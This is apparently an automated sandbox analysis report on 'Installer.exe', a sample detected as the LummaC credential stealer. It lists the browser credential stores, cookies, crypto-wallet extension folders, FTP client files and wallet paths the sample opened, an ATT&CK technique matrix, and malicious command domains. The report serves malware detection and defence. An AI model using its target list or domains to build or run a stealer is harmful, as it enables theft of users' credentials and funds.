                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: Yara matchFile source: 00000003.00000003.1835675481.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.1835591588.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.1835776038.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.1874516417.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Installer.exe PID: 7488, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: Installer.exe PID: 7488, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		2
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API                		Boot or Logon Initialization Scripts211
                Process Injection                		3
                Obfuscated Files or Information                		LSASS Memory11
                File and Directory Discovery                		Remote Desktop Protocol41
                Data from Local System                		21
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)1
                Software Packing                		Security Account Manager33
                System Information Discovery                		SMB/Windows Admin Shares1
                Screen Capture                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading                		NTDS1
                Query Registry                		Distributed Component Object Model3
                Clipboard Data                		114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                Virtualization/Sandbox Evasion                		LSA Secrets241
                Security Software Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts211
                Process Injection                		Cached Domain Credentials21
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Installer.exe34%ReversingLabsWin32.Trojan.Generic
                Installer.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://lev-tolstoi.com/apix:Z100%Avira URL Cloudmalware
                https://lev-tolstoi.com/$5100%Avira URL Cloudmalware
                https://lev-tolstoi.com/NVmA100%Avira URL Cloudmalware
                https://lev-tolstoi.com/espF100%Avira URL Cloudmalware
                http://microsoft.coc.0%Avira URL Cloudsafe
                https://lev-tolstoi.com/pi.W100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apim100%Avira URL Cloudmalware
                https://lev-tolstoi.com/S100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                		23.55.153.106
                		truefalse
                  		high
                  lev-tolstoi.com
                  		104.21.66.86
                  		truefalse
                    		high
                    cashfuzysao.buzz
                    		unknown
                    		unknowntrue
                      		unknown
                      scentniej.buzz
                      		unknown
                      		unknowntrue
                        		unknown
                        inherineau.buzz
                        		unknown
                        		unknowntrue
                          		unknown
                          prisonyfork.buzz
                          		unknown
                          		unknownfalse
                            		high
